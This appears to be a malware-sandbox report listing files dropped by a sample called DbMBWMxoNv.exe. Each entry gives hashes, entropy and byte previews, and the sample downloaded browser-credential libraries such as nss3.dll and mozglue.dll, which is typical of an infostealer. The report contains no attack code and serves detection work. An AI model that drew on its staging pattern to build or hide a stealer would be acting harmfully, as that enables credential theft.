Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\json[1].json

Download File

Process:	C:\Users\user\Desktop\DbMBWMxoNv.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1787
Entropy (8bit):	5.365863384956969
Encrypted:	false
SSDEEP:	48:SfNaoQQYin2i6TEQQYiSfNaoQMQyfNaoQcrMwrM1QcrMrfNaoQgrMp0UrU0U8Qw:6NnQ2nN6TEQ26NnQMQaNnQcr3rIQcrkk
MD5:	7363E94B5595CF894E980ECB8A0A5C9B
SHA1:	A3E16F3D7CFEBD6E35F67983E26E516758229D7E
SHA-256:	75F81C883304DB5A3C9C7677FB2910146136A892A944DEC5F6AEBA504E5EB476
SHA-512:	4FF8219472780C8F0C14324BD0FC76DD83C6AF72BB3BA641CC6E0BBC9FD1F97428D0CB930C30E7ACE2FF4860F2B940EAED134A63658881EC5507FBF7A020BAC4
Malicious:	false
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/B72D19599A01E960B69AA7AF414AA9BA",.. "id": "B72D19599A01E960B69AA7AF414AA9BA",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/B72D19599A01E960B69AA7AF414AA9BA"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/C54460A287D2B2256D132CAF976B611F",.. "id": "C54460A287D2B2256D132CAF976B611F",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/C54460A287D2B2256D132CAF976B611F"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtoo

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\DbMBWMxoNv.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\DbMBWMxoNv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\DbMBWMxoNv.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\DbMBWMxoNv.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\DbMBWMxoNv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\40c15e5e-c3fe-4ec5-8534-ed93f25ed988.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Temp\4cfece1f-55e3-4340-9ec9-abe9f6680de3.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
Category:	dropped
Size (bytes):	206855
Entropy (8bit):	7.983996634657522
Encrypted:	false
SSDEEP:	3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEI5:l81Lel7E6lEMVo/S01fDpWmEgD
MD5:	788DF0376CE061534448AA17288FEA95
SHA1:	C3B9285574587B3D1950EE4A8D64145E93842AEB
SHA-256:	B7FB1D3C27E04785757E013EC1AC4B1551D862ACD86F6888217AB82E642882A5
SHA-512:	3AA9C1AA00060753422650BBFE58EEEA308DA018605A6C5287788C3E2909BE876367F83B541E1D05FE33F284741250706339010571D2E2D153A5C5A107D35001
Malicious:	false
Preview:	......Exif..II.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..B.P..(......................................( .................... .".... .".......(.. ."....... ....o......E.6... ....."........."J......Ah......@.@@....:@{6..wCp..3...((.(.........................@..(...."............................ ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

C:\Users\user\AppData\Local\Temp\530d0108-04cd-4778-8cc8-8dd5d0b26b14.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 135363
Category:	dropped
Size (bytes):	76326
Entropy (8bit):	7.9961120748813075
Encrypted:	true
SSDEEP:	1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iysAGz8vBBrYunau6wp:GdS8scZNzFrMa4M+lKqeu/nr
MD5:	01E352D35675990A139199DD86B38AAC
SHA1:	E16163C81E5F36B3B819AA0A63BFA63D88548A91
SHA-256:	148CDE42D38C62C1A1E8B8D3D4BD8830F0F8C2DC684E3C59B0A510E31011CA4A
SHA-512:	75A58FFAD6E3E0546268CC863AE382B5429795D8BCED64BAE2D06BCEEB6C2E37BD656A3E335EB61B521888B76913F2D0281F8C9C081FF8637307AE5934D98C8B
Malicious:	false
Preview:	...........m{..(.}...7.\...N.D.w..m..q....%XfL.I.ql..;/.....s...E...0....`..A..[o^.^Y...F_.'..."L...^.......Y..W..l...E0..YY...:.&.u?....J..U<.q."...p.ib:.g..^.q.mr.....^&.{.E.....,EAp.q.......=.=.....z^.,d.^..J.R..zI4..2b?.-D5/.^...+.G..Y..?5..k........i.,.T#........_DV....P..d2......b\..L....o....Z.}../....CU.$.-..D9`..~......=....._.2O..?....b.{...7IY.L..q....K....T..5m.d.s.4.^... ..~<..7~6OS..b...^>.......s..n....k."..G.....L...z.U...... ... .ZY...,...kU1..N...(..V.r\$..s...X.It...x.mr..W....g........9DQR....*d......;L.S.....G... .._D.{.=.zI.g.Y~...`T..p.yO..4......8$..v.J..I.%..._.d.[..du5._._...?\..8.c.....U...fy.t....q.t....T@.......:zu..\,.!.I..AN_.....FeX..h.c.i.W.......(.....Y..F...R%.\..@.. 2(e,&.76..F+...l.t.$..`...........Wi.{.U.&(.b}...}.i..,...k....!..%...&.c..D-."..SQ.......q9....)j....7.".N....AX...).d./giR....uk.....s.....^...........:...~......(hP..K.@.&..?.E0:+D\|9...U.q.cu..)t{.e...X...{.....z......LL&I6.=.

C:\Users\user\AppData\Local\Temp\6e8cbed9-3700-427e-866a-17f9724b8d0e.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	135771
Entropy (8bit):	7.802585890890899
Encrypted:	false
SSDEEP:	3072:LtlntxI0jRnnf4pTz8IayMaCRABlauflM+u0F/oWRW:pl4+hf4pTky1EABYufNFS4W
MD5:	DA75BB05D10ACC967EECAAC040D3D733
SHA1:	95C08E067DF713AF8992DB113F7E9AEC84F17181
SHA-256:	33AE9B8F06DC777BB1A65A6BA6C3F2A01B25CD1AFC291426B46D1DF27EA6E7E2
SHA-512:	56533DE53872F023809A20D1EA8532CDC2260D40B05C5A7012C8E61576FF092F006A197F759C92C6B8C429EEEC4BB542073B491DDCFD5B22CD4ECBE1A8A7C6EF
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.qBa/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.\|.X.M..u..s[...?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[...........=.B.../EYp....i:........ua....w...\H.j....b....4...l.b.:u.%1z....}L.A.F.IZ.2^.j...!F.&@;L..z...02..`:J_@....m....qcQ.\|sD.r`vC.#.8lm...R.8.~A...."~)".[.M...o.a.H.$..(.d/.K.6......c........#.$..>.#..3..-...n4J.$-....N...s.G...3..q.e..(.B?."...9M......[0Y0....H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...H0F.!..w./B..$<......r-.'..xp.H..Q...8.!..R^...%..W0....q....g.D..~.".%............mo.:......<#a..e...Chp...x4z....!.!.a...qgo....p8.T.6...Z....?..CV...<..K...?....k..........q=....Y^........!..K...G...m.n..Y.Y.......u.Wf...TO".?.......U/Rd..Y....j....H..Q...{.....x.OQ.~+}...L.9_.:.,E.....q.0&...I;b..H...>...9.}.B

C:\Users\user\AppData\Local\Temp\b33adbda-eabd-4499-b378-378533ba35f9.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	11185
Entropy (8bit):	7.951995436832936
Encrypted:	false
SSDEEP:	192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
MD5:	78E47DDA17341BED7BE45DCCFD89AC87
SHA1:	1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
SHA-256:	67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
SHA-512:	9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0....H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

C:\Users\user\AppData\Local\Temp\b6b162d4-4cff-4e3d-8531-0b4a18d4c79f.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Temp\cv_debug.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1420
Entropy (8bit):	5.405330766329385
Encrypted:	false
SSDEEP:	24:YK0bl5r75riCe0qW+5Ua02EHP5IKL0jZ5JwbX/B+L0+MQz5YLfx5YL7vx0h:YK0bl5r75riN0qW+5Ua02sP5IKL0jZ5I
MD5:	2563F20A59A69275813B7D2497C04CC0
SHA1:	5ACCCC4DF81A45AE4861FF5DA9BA85FC44F486B2
SHA-256:	5BD5A25C3826A164DA1B178F4C5390900F8A4BA18EEA840DBBF2520011BF37C3
SHA-512:	73E7D6047E7C274918A85D9B919B79C1AF23657A4407E37968F9FCE296338B820E01491421443E12BD6EE04308D90E896E6B93A7CE726AB40D4FC8F2FFE78298
Malicious:	false
Preview:	{"logTime": "1005/074019", "correlationVector":"Jzai6BfByv5amZ45/NBe5r","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/074027", "correlationVector":"eO8FwRQNRwFtIUhPNa0yBN","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/074027", "correlationVector":"DFCC0B139A2547CAA3433B33892C7FE6","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075031", "correlationVector":"bWXPYvVSVVANvrGBV6dHxn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075032", "correlationVector":"4CD8E3A1D096444AAB77DA6A690C4356","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075123", "correlationVector":"t3DmiSvoNTibe+/mLDIMfl","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075124", "correlationVector":"B2B504519464422FA5C6E610072CF270","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075313", "correlationVector":"/q9eTq3f/ZawbQrLDVWKju","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075314", "correlationVector":"138D0C7D

C:\Users\user\AppData\Local\Temp\dd6412fa-a253-4b99-b622-a1f8fcded6b4.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	PNG image data, 400 x 400, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1574725
Entropy (8bit):	7.9933690792052605
Encrypted:	true
SSDEEP:	49152:74QrlJUA1b0CfOU5vPicRFhfJcHEUp9CLmLc23:7vvUA1nWqnhfekUpEmLr3
MD5:	4C95905339508C8A20861746DB447557
SHA1:	C1CE86718B1E8E2D6C435DD30F23BC12E07C7264
SHA-256:	AFBE5DC1358ABE654B05D80C3B4BA4147EE800850EAA763525980B3CF40032EC
SHA-512:	3D5FB6BBBF5DE6BB2FFC81A33BEF170293D4309405F43E084BD2706AE3D71AFC44DDB9F72DC2FB37E7BE3F951893B5318157006DEA52E634B116483FACC68B4A
Malicious:	false
Preview:	.PNG........IHDR...................>iCCPICC Profile..H..W.XS...[.... .... "%...Z..E........vtQ......U.......(..XPP..]y....+.\|3..3.9s..2..O.$..T..\q.46$.9&9.I..(...P@...$......@.....@..UG..?..k...... .............K......\|....t.0@...q..W.q...Q...r n.@...I3...yf.?.jh.B.,.........N.@...-..@,.g.....7.AM./c.+.(j..<I.o.....]rsd.>.a.fJCc.k.y..=)\......". ...H.....d.B.....?..s.. v....!6.8X.......E.\...A......C.P......(.....K9l...'U...z .N`.._g..}L.03>.b.....H.5 v...W...D..He...-!...C...XA.48Ve_..7.^lc.......3.C...Z.<E.p-.e...0.#...1...00H.v.K(N.S.\|.......IN...7...ys.]...Ts..\|.!..x.$?:^.'^....V./........`M..@....4....`..R....Q...HR..a.......A......@.. .l.A.b.@1#.<.8....._..%.....@F...<X.0..X.....`.3l.D...G&}...D.$....v.!.{.......g....nOxJh'<"\'t.nO..I..r4....\......j.....T...n..qW..A.n...g.....V...P...(y..l..L.{..A.y...2..\|s.G~...!....l.-..cg...y......q..k.....z..]..b..dC..?..\Yy&.k....(..S..h..$.&.ed.3... dr.\|.aL.g.W.......M...~...................

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\6e8cbed9-3700-427e-866a-17f9724b8d0e.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	135771
Entropy (8bit):	7.802585890890899
Encrypted:	false
SSDEEP:	3072:LtlntxI0jRnnf4pTz8IayMaCRABlauflM+u0F/oWRW:pl4+hf4pTky1EABYufNFS4W
MD5:	DA75BB05D10ACC967EECAAC040D3D733
SHA1:	95C08E067DF713AF8992DB113F7E9AEC84F17181
SHA-256:	33AE9B8F06DC777BB1A65A6BA6C3F2A01B25CD1AFC291426B46D1DF27EA6E7E2
SHA-512:	56533DE53872F023809A20D1EA8532CDC2260D40B05C5A7012C8E61576FF092F006A197F759C92C6B8C429EEEC4BB542073B491DDCFD5B22CD4ECBE1A8A7C6EF
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.qBa/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.\|.X.M..u..s[...?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[...........=.B.../EYp....i:........ua....w...\H.j....b....4...l.b.:u.%1z....}L.A.F.IZ.2^.j...!F.&@;L..z...02..`:J_@....m....qcQ.\|sD.r`vC.#.8lm...R.8.~A...."~)".[.M...o.a.H.$..(.d/.K.6......c........#.$..>.#..3..-...n4J.$-....N...s.G...3..q.e..(.B?."...9M......[0Y0....H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...H0F.!..w./B..$<......r-.'..xp.H..Q...8.!..R^...%..W0....q....g.D..~.".%............mo.:......<#a..e...Chp...x4z....!.!.a...qgo....p8.T.6...Z....?..CV...<..K...?....k..........q=....Y^........!..K...G...m.n..Y.Y.......u.Wf...TO".?.......U/Rd..Y....j....H..Q...{.....x.OQ.~+}...L.9_.:.,E.....q.0&...I;b..H...>...9.}.B

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\128.png

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	4982
Entropy (8bit):	7.929761711048726
Encrypted:	false
SSDEEP:	96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
MD5:	913064ADAAA4C4FA2A9D011B66B33183
SHA1:	99EA751AC2597A080706C690612AEEEE43161FC1
SHA-256:	AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
SHA-512:	162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
Malicious:	false
Preview:	.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...T.P.B...*Tx...=.Q..wv.w.....\|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......\|..}./.....e..,.K.1........W.u.v. ...\.o

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\af\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	908
Entropy (8bit):	4.512512697156616
Encrypted:	false
SSDEEP:	12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
MD5:	12403EBCCE3AE8287A9E823C0256D205
SHA1:	C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
SHA-256:	B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
SHA-512:	153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\am\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1285
Entropy (8bit):	4.702209356847184
Encrypted:	false
SSDEEP:	24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
MD5:	9721EBCE89EC51EB2BAEB4159E2E4D8C
SHA1:	58979859B28513608626B563138097DC19236F1F
SHA-256:	3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
